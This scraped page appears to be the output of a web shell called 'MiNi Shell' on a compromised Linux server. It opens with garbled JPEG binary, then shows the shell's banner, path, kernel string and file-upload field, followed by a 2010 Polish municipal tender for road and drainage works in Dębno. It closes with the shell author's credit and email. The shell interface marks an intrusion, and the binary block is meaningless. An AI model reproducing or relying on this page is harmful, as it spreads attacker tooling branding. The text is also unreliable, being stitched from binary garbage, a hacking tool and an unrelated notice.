JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100921/300486-N-2010.html

<p class="kh_header"><b>Dębno: Przebudowa skrzyżowania ul.Planty, Kościuszki i Szkolnej w Dębnie wraz z miejscami parkingowymi oraz dróg wewnętrznych</b><br>
<b>Numer ogłoszenia: 300486 - 2010; data zamieszczenia: 21.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dębno , ul. Marszałka J. Piłsudskiego 5, 74-400 Dębno, woj. zachodniopomorskie, tel. 095 7603001 do 4, faks 095 7602030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.debno.com.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa skrzyżowania ul.Planty, Kościuszki i Szkolnej w Dębnie wraz z miejscami parkingowymi oraz dróg wewnętrznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
I. Przebudowę skrzyżowania typu prostego i parkingów przy ul.Kościuszki wg dokumentacji projektowej objętej decyzją pozwolenia na budowę, wraz z remontem ul.Kościuszki i ul.Szkolnej w Dębnie w granicach nie objętych pozwoleniem na budowę (na podstawie zgłoszenia robót nie wymagających pozwolenia na budowę) będącymi drogami gminnymi, w następującym zakresie:
1. Infrastruktury drogowej tj.:
1.1. Przebudowa jezdni z wykonaniem konstrukcji podbudowy i nawierzchni mineralno-bitumicznej dla kategorii ruchu KR2, o pow. ok.745m2.
1.2. Frezowanie i wykonanie nowego dywanika mineralno-bitumicznego w ul. Szkolnej (od skrzyżowania Planty - Szkolna do ul. Jana Pawła II) i częściowo w ul. Kościuszki (od końca opracowania projektowego do ul. Mickiewicza), o łącznej pow. ok. 613 m2 z miejscowym uzupełnieniem podbudowy i regulacją / wymianą krawężników.
1.3. Przebudowa zjazdów indywidualnych i publicznych z nową podbudową i nawierzchnią z kostki betonowej gr.8cm o łącznej pow. ok.74m2.
1.4. Przebudowa chodników z nową podbudową i nawierzchnią z kostki betonowej o łącznej pow. ok.736 m2.
1.5. Przebudowa i rozbudowa parkingów wraz z jezdniami manewrowymi (parking przy rzeczce, parking na ul. Planty, parking przy przedszkolu) z nową podbudową i nawierzchnią z kostki betonowej typu Starobruk o łącznej pow. ok.887m2.
1.6. Wykonanie skarpy i murku oporowego przy parkingu na Plantach wraz z barierką ochronną o wysokości 110 cm z rur o 50mm zabezpieczonych antykorozyjnie i malowanych proszkowo o dł. ok. 14 mb.
1.7. Wykonanie docelowej organizacji ruchu (znaki pionowe, poziome, pasy).
1.8. Wykonanie terenów zielonych (w granicach zakresu przetargowego, ok. 190 m2) obejmujące:
a) wybranie i wywiezienie nadwyżki ziemi,
b) humusowanie ziemią urodzajną o grubości warstwy min 10 cm, w tym wyrównanie i wałowanie,
c) obsianie terenów zielonych trawą wraz z pielęgnacją przez okres miesiąca.
2. Sieci zewnętrznych tj:
2.1. Rozbudowa sieci kanalizacji deszczowej obejmująca:
a) wykonanie nowych rurociągów grawitacyjnych z rur PVC o 315 mm SN8, oraz z rur PVC o 200 mm SN8 o łącznej długości ok. 127 m, (odcinek W1-W7, D7-W6, D7-W5, D4-W4, D3-W2, D8 - do końca nowej nawierzchni w kierunku D9 z szczelnym zakończeniem),
b) wykonanie studni betonowych o 1200mm - szt.8: D2, D3, D4, D5, D6, D7, D7.1, D8, (D1-do regulacji wraz z wymianą płyt zwieńczenia studni i montażem pierścieni odciążających typu ciężkiego),
c) wykonanie wpustów ulicznych o 500mm - szt.7: W1, W2, W3, W4, W5, W6, W7;
d) wykonanie odwodnienia za pomocą ścieku typu ACO-DREN o łącznej długości ok. 60 m,
e) regulacje istniejących skrzynek ulicznych oraz studzienek kanalizacyjnych wraz z wymianą płyt zwieńczenia studni i montażem pierścieni odciążających typu ciężkiego.
2.2. Wykonanie przepustu kablowego w ul. Kościuszki o dł. 11m wraz z położeniem i odpowiednim zabezpieczeniem do późniejszej rozbudowy linii oświetleniowej - kabla o długości 31m (zasilenie z istniejącego słupa nr I/17).

II. Przebudowę dróg wewnętrznych na osiedlu mieszkalnym w rejonie ulic. Jeziornej i Daszyńskiego w Dębnie, w tym:
1. Budowę kolektora kanalizacji deszczowej na odcinku od studni D1 do D.4, z rur PVC o 315mm, o łącznej dł. ok. 75,2m  i z PVC o 250mm o dł. ok. 11,4m oraz budowę wpustów ulicznych W.1.1.- W.1.4., W.2.1, W.2.2. i przykanalików z rur PVC o 200mm, o dł. ok. 40m. 
2. Przebudowę dróg wewnętrznych obejmującą rozbiórkę istniejących nawierzchni, budowę nowych nawierzchni z kostki betonowej wraz z konstrukcją  w tym; jezdnia o pow. ok. 620 m2 ,  parkingi o pow. ok. 430 m2 , ciągi piesze o pow. ok. 540 m2.
3. Remont istniejących i wykonanie nowych chodników w tym: rozbiórka nawierzchni z płytek betonowych o pow. 58m2, rozbiórka 82mb obrzeży,  wykonanie nawierzchni  z kostki betonowej gr. 6cm na podsypce cem-piaskowej gr.4cm o pow. 117m2.
4. Rozbiórkę i odtworzenie obudowy śmietnikowej.
5. Wykonanie terenów zieleni - humusowanie i obsianie trawą.

Szczegółowy zakres robót określony jest w dołączonej do specyfikacji istotnych warunków zamówienia, dokumentacji projektowej i specyfikacji technicznych wykonania i odbioru robót, a także w Wytycznych do wyceny wg załącznika nr 5 do siwz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Ewentualne zamówienia uzupełniające zostaną zlecone odrębną umową zgodnie z art.67 ust.1 pkt 6 uPzp. Wartość robót uzupełniających zostanie ustalona na podstawie jednostkowych cen ryczałtowych, odpowiadających pozycji zestawienia rzeczowo-finansowego (będącego załącznikiem do umowy) i ilości zlecanych jednostek przedmiarowych w zamówieniu uzupełniającym.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.11.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości 15000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał: 
1. Przynajmniej 2 budowy, przebudowy drogi publicznej kategorii min. drogi gminnej, obejmujące m.in.: wykonanie nawierzchni z kostki betonowej.
2. Budowę bądź przebudowę sieci kanalizacji grawitacyjnej sanitarnej lub deszczowej. 
Dokumentami potwierdzającymi spełnianie tego warunku będzie:
a) Wypełniony wykaz Doświadczenie zawodowe wykonawcy - wg załącznika nr 4 do siwz - robót budowlanych, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem nazwy i opisu przedmiotu kontraktu, adresu inwestycji, nazwy i adresu inwestora, dat wykonania, oraz załączeniem:
b) dokumentów wystawionych przez odpowiednich inwestorów potwierdzających dane z w/w wykazu oraz, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełniania warunku na podsatwie dostarczonych dokumentów, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponować następującym składem osobowym:
1. Kierownik budowy - z uprawnieniami budowlanymi do kierowania robotami budowlanymi w zakresie nieograniczonym, w specjalności drogowej.
2. Kierownik robót - z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności instalacje oraz sieci wodociągowe i kanalizacyjne.
Dokumentami potwierdzającymi spełnianie tego warunku są:
a) Wykaz osób, które z ramienia Wykonawcy będą uczestniczyć w wykonywaniu zamówienia wraz z informacją o podstawie do dysponowania tymi osobami wg załącznika nr 3 do siwz,
b) Uprawnienia budowlane do kierowania robotami odpowiedniej specjalności,
c) Aktualne zaświadczenie o wpisie do Izby Inżynierów,
d) W przypadku personelu niebędącego pracownikiem wykonawcy należy wypełnić Zobowiązanie do współpracy wg załącznika nr 3a do siwz. 
Ocena spełniania warunku na podsatwie dostarczonych dokumentów, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z rodzajem robót stanowiących przedmiot zamówienia. Ocena spełniania warunku na podsatwie dostarczonych dokumentów, metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód wniesienia wadium.
2) Formularz oferty wg załącznika nr 1 do siwz.
3) Wykaz osób i podmiotów ubiegających się wspólnie o  udzielenie zamówienia wg załącznika nr 1a do siwz.
4) Pełnomocnictwo do reprezentowania w niniejszym postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) - jeżeli dotyczy.
5) Zestawienia rzeczowo-finansowe wg załącznika nr 6a i 6b do siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana kierownika budowy i kierownika robót wymaganego na etapie przetargu może nastąpić wyłącznie po akceptacji Zamawiającego na wniosek Wykonawcy po przedstawieniu dokumentów potwierdzających, że osoby te spełniają wymagania przetargowe. Zmiana ta wymaga obustronnego podpisania aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.debno.com.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego w cenie 50zł. Osobą upoważnioną do kontaktów z Wykonawcami jest Andrzej Paluch, Barbara Remberger, Zbigniew Moździerz, pokój nr 31, tel.wew.137, w dni robocze godz.8:00-14:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2010 godzina 10:45, miejsce: siedziba Zamawiającego, budynek A, sekretariat-pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com